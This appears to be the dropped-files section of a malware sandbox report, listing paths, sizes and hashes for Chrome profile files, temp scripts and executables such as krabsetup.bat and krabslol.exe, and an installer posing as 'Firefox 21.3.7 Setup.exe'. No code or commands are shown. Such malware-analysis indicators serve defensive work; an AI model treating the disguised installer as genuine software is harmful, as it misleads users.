C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000015

Filesize
48KB

MD5
0c2234caae44ab13c90c9d322d937077

SHA1
94b497520fcfb38d9fc900cad88cd636e9476f87

SHA256
d8e6f62282e12c18c930a147325de25aef1633a034eaf7a3ce8de1fb8de09912

SHA512
66709f74b19499df1e06700e1c257e14a82ca4287194e4b177b3f333748d927f413c8c459a35e7e5a2f92d28410b0129f106d94e3dd85bc0dd0b986add83b18f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000016

Filesize
24KB

MD5
e1831f8fadccd3ffa076214089522cea

SHA1
10acd26c218ff1bbbe6ac785eab5485045f61881

SHA256
9b9a4a9191b023df1aa66258eb19fc64ae5356cfc97a9dda258c6cc8ba1059ac

SHA512
372c486ac381358cc301f32cd89b7a05da7380c03fa524147c2ddf3f5e23f9b57c17485aaedc85b413461a879afc42e729547b0c96c26c49bbdb7301cd064298

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000017

Filesize
44KB

MD5
a4b04ba2b9a56f5911fee0c29629e53e

SHA1
939e8e65e22ae978a6b63dd1400fc6f58c5015eb

SHA256
523d8983d24e050e6e7e1f43d0caca6bd77bef38ec046d181b13bf32702fc025

SHA512
1c3357e9ecd3ac0de53d14f5d4c8d8d0aeafd30cb2e0dd6cfd1be68cca4fd4e178e79938a5ffe9a17b43e4f60f6e8e08c1054fa44160377fea740da70761c80f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000020

Filesize
21KB

MD5
9ccb3e387ecf1d1c32d33a33b61db8f3

SHA1
9d6625afcaa4d6bfe223268ccf82ff32ea9532a3

SHA256
3d34b64d0099f608de0e555d46338252a99d36f2a25af7180702c9966621fa0b

SHA512
05c3d41fd4115bd66c1a938ad644424f8df93f96ae27004c800e43acbc4b23568456574ceba605ea696fb594585811fedd0f9ec547a697344479e4d7516f65f4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
dc6242b5a2f8bb2ee961f28e965b9c03

SHA1
8e9e29e97b6511010ba86765c67d96db213f7df4

SHA256
dea47b0306953256dc1a5d132c21da77c09456ad0a1473181df482ef2f3b8805

SHA512
629162450fe9bda55a1823616dee3a37a1736b44f917823efe4c938911000fe5c882e08c6a11448f0cb602a84757aba9b32889cab28d4226b92eb2e5a9ae3c56

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
921202c4ed560eecf8d6b1a3f96fefff

SHA1
f7bed600cf2a4bdf8859affeddea92672e8c591c

SHA256
d3e62b65aa02e30a38e00b11c64e3a3060b4e7daa017078d822f2058c4936dc6

SHA512
80928f24425899d2a3b667da47ac93191bf1fa1348e84ccaada356a464cfbb403059edc81f7af2cdba2e51b76fc343c0fbe080fb8634510418fa30325740e20a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
319ba571424f72da146301cef3d0a506

SHA1
45d607b17318af778120a979fe283f6d283ac91c

SHA256
be244c612b2d16d2b126a53cfec02bb32e64d797b1431cca70d6e057c08d10a3

SHA512
f609c59e7b30da20e367276476332843446458b5fa9e01383da5b4370e50a0522194433d9ca2c31cb82c5a4a3e809a2b459b9df04eaba1e8452d9c7890e9f4c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
641551597b808913b7ff0bdac60f205b

SHA1
e2c91ef7af37da6881e8e22cfe8763ccf15f5968

SHA256
5e31dff22aa3502b2672cea43e6463de45ad9d5c4309fc51c4457e7a3f6c0984

SHA512
b9db4f1e2e4fc9e2226fbbdf6070ff9e5d7b9e8bee3f3dcb84d560128d562bdd8b3d66b21a9b4b79065eabb1c4503a5280379c896adee4cbdc03e4118ca0d9d1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
eff98951ce024d3acd72f05612d20d4b

SHA1
38e867af840ca4b87574d4df2156bb170d7fcc88

SHA256
75b970bad6ebf06c7e6c3f8c0c726d30f42d64bebd507e220edd69e16cdacaba

SHA512
d38155e74fe6a4b948f68b22fd43a8297f989e64b05208f9977534d8e39517d61591dd3d057f9c0abee9416eb4ba72cc155e05bb99b4e63390f59eaed69b8b81

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
9188961641f108ff1fad3c5fe75e55ad

SHA1
57661e522deb01b2e56b61c7eba0f3bedebf9a1e

SHA256
d26264a8a62e4c4e9bca0e5d2f932c8430dcdbd884f40d37646cdaedf61e958a

SHA512
7042e55b9b00f970a965ec2a711870e8d68c7367b7913ec8d6a4705cd7843ec77f7e2c98a414cc139300b61fc9173f0617d1aef94600e532c09b7a703f5d1da9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
4096656df094e990b858f4c799c9d073

SHA1
68833c4377cf06272790e77aac98dc471d86a01e

SHA256
e573d6bdd9da8fde1e9aedb5af46a15e05b22eac0c699907ec095c496dcbad62

SHA512
4c45fe5764ba81e66d5704a3ebe30e8d581dad19105f93689c6cf8155f958527ea2e586f1d9e61e313c25129f4cfe8f1da41cad2abe51352f51b769b9d170390

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
e3557ac50baf3a6060a98c9fb74e75a9

SHA1
f13dc0320e7575a608fd38546ee5cde13b3d32fa

SHA256
987060876e5cc8b9a656f5154aa8bc4767fa1747773b6b173fdf1a29606046d0

SHA512
2d05708053bda2dd56987d39b57636797a98b4ba26cf27cbaa5d0c4be4dee2bd6b2b6fbb2e312e0944d2c9a206ab3aeefa6b6421038fe62449ae6ec018c9a1ad

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
dad3b80a253437638556ecf77cce5ebf

SHA1
6364aefd7f019a5305e88b41b562e0b914b2a14b

SHA256
33422e9b3289ed55809fa8434c6440b16ad7ce81fa6fea209e1cfb0979e8db4b

SHA512
34395fa09835d0fe20d0777be88c28de7c481156092b42a08cb43302187b5e5dc8cf74d43bef2ada093c47be74dcf5aab70d7eda9358ee66620e35f32616a63c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
0ee61f3b954bc09905946922f99eafcf

SHA1
d89c7a0bf9e8c1512ffe42a03fe66502e2812253

SHA256
b5de39b8297c7e2827f64f9a807770ccbb18a07d1869fd07893492d0b9ce4126

SHA512
351355155fc72215bda5b6c8fa9a179e1386311e1ed7eabd156315df396575eb3cffb00738b399854ee15f1bff2b98cb654473dad3a661d1e1e617e043e839f3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
ac4c13499664ce1fa01a9b78398d59b4

SHA1
e949d431001d81614ac73e4c34a91de55cc24461

SHA256
3ede8adb53fbefad052aecc38c1ade8cd34b1c34aad78b1a02a75d44e896eb74

SHA512
2f548b51e6dc48121975ae7a227e9016d4253745da788fbb9e103460ba5814fa8e705002da38d211d6bf6c24f0f4e0aabb5477d7010389dd64f5191d7c039ad4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
ccf703279872cb21a45a1540cabce996

SHA1
21d58d41e07939841a7334c8b3e142bc9d6eeeb1

SHA256
2a42e42d957c098d22895e59358bd463bb80ee55785a7aa6fec51ab56efe2b69

SHA512
738ef087493fe4c7491ce4948d19d193a6dedf8792f7ec5898ef49c5114b58b456c31804746e0a381a969ee4115951857f45962d1e97073269df9515e9db8206

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
a16e179c7e784c4eda2e2703e0b3b9a3

SHA1
d3ab2aac606828b3ed5d1100f705ca9a2ed73815

SHA256
6e8da7770f70222e2db46a3dc3ba07dc867c9bad8978aeb694a4e40a42caca47

SHA512
dd383a5ddad0c3e58d0c015e3a14644646a322a6794bbe2dfd2961386105abff2f1065c8a4a46d972f192d2439dd069a896c690f7fb54d3ae7d9b51ac54149bc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\cb71a685-dfe5-4fc0-8db0-dc365fdcfe7c.tmp

Filesize
7KB

MD5
302027ecd679d8c61e0733fc65c3c881

SHA1
51fe120d2f2cae229210749090d4760510a589ad

SHA256
1cdcc58c6dd0db5ac613101fb1e693eb1094561ab25dbf9184688d111c4a0d5d

SHA512
6d1a5eadad56544317c4a35afee250553a6222b250ed00d2559d950536577f041bf96b39f383148c9e7992fb5a675cc7220f1b947065d723213d89c166d624e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
130KB

MD5
44ccff0d26884a2993a0539f99ecc1a1

SHA1
f727f3777a1970e206beaf666f242389e1a9b1fc

SHA256
53cb5c050318a6ddbf4a06c150341fc38182f18063a03b11347a2ba404050f70

SHA512
49032241f2679fb45659682c2cb7435380a232634e23820d0491dd9491baff5e19fc00db9c80f09f91d5979f05cafea1c6930d25ef1b9966e76581c9f003d9be

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
130KB

MD5
ea206642ae5c700977aa9b25ffd7666f

SHA1
1f96c21bcd9a18f462d5fa7092455906a2789f30

SHA256
a913bfc58abd09fb98076af119be8c099b68187698a9217afc4990e27a6e33a3

SHA512
cb40d0b6854dbb89af836333f24ac4ebb0b7d991864604e6fc4cc6e827ba1e065a5f8dcf5fc99924656213569224f49cf00303b74f70b88f06da8252278cd75e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
101KB

MD5
9f0f51104ff2356cd6a76d402b423f6a

SHA1
21ec85839e11cfcf79e67e414257528f7b4b8c74

SHA256
98c49bbb2260ad30bb9b43f9deaef0b38dddd2b4fddcee6bfe025682004c2b95

SHA512
bb2c65bd432a29bf0e2ae83575358c81a33ec68ca025db0eb163e33579fd23f8d83c609aace5e8c7d9f12de1eb895f53e4fa783f8d16638ad4e8b6580b3bd219

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe599c36.TMP

Filesize
88KB

MD5
e2c2e20eede1978165087ab65db05449

SHA1
6224cfdb698ce482b608eb4491d78bfad53022a9

SHA256
5d814a4b04498703ba6ef7a319b08ea7e64caeaac75300abeb28f725f286115e

SHA512
7127c0b7da0f6d94144d159550a9369fbc0e2f8d659eb11d33273b9707aa5925f1ea47ee6c53a5e12ce132b7aa39fc4681a37183a1510d5f4e4bd76518a941f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7574.tmp\Firefox2137.cmd

Filesize
310B

MD5
141b39729c97b1601a94b88ec4541758

SHA1
88d3c8d1175c93f0489a7614e1ce55e64fc25b49

SHA256
fdc9c6ded6792bc9f158f0638fda6f44da8e625553adeada223d8abd7ce0b663

SHA512
8e9da5ab576837a3c409bda6e08f43c375af8dfaf486859e2604e48e621acaa09dadf2b9f393b5dea9d17a7dde5d36052667b2a7e10f270944c10a69394e9f32

Download Submit
C:\Users\Admin\AppData\Local\Temp\7574.tmp\papaj.exe

Filesize
88KB

MD5
107ae8b0226ca50a2a39c9eb1b4a31c1

SHA1
515e99757bf9fe05b8d840238651a1c0ba8ee577

SHA256
99d80c79b645feff55265bc82c1c31589209fe8df93c311afa58a6845e337312

SHA512
723844497c7a5dda33548b1a9800816e7ebbe050f9db0a5d5d061d1f2d7ee16861856c06a35d859fb1f408a8d84fd1482e28187ac5cf6b51fa5a5de28b89ebf2

Download Submit
C:\Users\Admin\AppData\Local\Temp\bg.bmp

Filesize
11.7MB

MD5
009b9f7e5b7b45674e6de11dfbc5873d

SHA1
fc848c11b0eb1c48b6e49e59bfb2df069ccf7756

SHA256
5b40b1922ac983f07ecc3e444813734aa03ce3270b7e5c0dc93610e34ed58de7

SHA512
cfe2087b0711a5d7ce486f338c49d5c6147b3c931f13b3ba27628200f26c3a9776de91a1cabd7bfd274a08fbe7b8a4f9ec172e4f7cfbf3234c8aa35399d03549

Download Submit
C:\Users\Admin\AppData\Local\Temp\krabsetup.bat

Filesize
1KB

MD5
7f5a110ccd8737cebf3f52b49424eecc

SHA1
67a0a8ef8745e20b1cc100a2ab95cde32ad7959a

SHA256
2ae0d42a78a32d4f8f81060cbe29b95eff8a90031690d2b7cc70d540a6110d03

SHA512
68d4d79c3007b50dcbd783f6e3020b8e640613c79943c8cf82456dcb7892baf0466b4f2dba4a3b9da6240cb305acdb3c9000f7b80bf63649ade767d8963476c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\krabslol.exe

Filesize
19.3MB

MD5
e1a919b2c68ec9e615b390adb8064bf0

SHA1
a0cab57b6bdbe2dcb888ea07fe4ed161916f6398

SHA256
6166b3e0ec7478ac54b33edaf001fb2421f15a559bcc0f37f09c08a4e466fda8

SHA512
3e837cd486806d63516488b2ac0a514e2e03bf3d7c511a7aa6c532c0569580cfbe81311d57b4a3621ee151806994e0935cf2528fadfe275a8a9a3242610a4279

Download Submit
C:\Users\Admin\Downloads\Firefox 21.3.7 Setup.exe

Filesize
163KB

MD5
34d62303e757aac3144ad3478619fdde

SHA1
a6fa411c5e8b1715568805ee7d09150d96ee8977

SHA256
851fed5d7b5c0f331d61ff67eca02c3d0bc5214848bdaaa5f6069a86050792a4

SHA512
248358ccdfd86cc56ca77edbe5aedfb656751d312dfff9598f1eb59fb4494ff07566011417808b94451064f0e323c3464142f1b03d337ca5a895c0d435b19da9

Download Submit
C:\Users\Admin\Downloads\HorrorKrabs.zip.crdownload

Filesize
12.5MB

MD5
b075e5820bd51ea1edc114d8643dbecb

SHA1
6a88b93c174423486fad95346dd4c6f9958ed2d6

SHA256
216f31c18146824ec864ce1cd25980075831e6194e8fc8995554239a3070f62f

SHA512
798eda968adb4eade2cf58c967200587a163b9b0e3a650d37e3b1424b721734f01f820ee22c10b906c084fe78c73c8e19bc610562b80fe127bacdbc8d3c21f0a

Download Submit
memory/2608-624-0x0000000007F10000-0x00000000084B4000-memory.dmp

Filesize
5.6MB

Download
memory/2608-625-0x0000000007A40000-0x0000000007AD2000-memory.dmp

Filesize
584KB

Download
memory/2608-623-0x00000000073E0000-0x000000000747C000-memory.dmp

Filesize
624KB

Download
memory/2608-622-0x0000000000C80000-0x0000000002BA8000-memory.dmp

Filesize
31.2MB

Download
memory/2684-539-0x0000000000400000-0x0000000000449000-memory.dmp

Filesize
292KB

Download
memory/2684-527-0x0000000000400000-0x0000000000449000-memory.dmp

Filesize
292KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads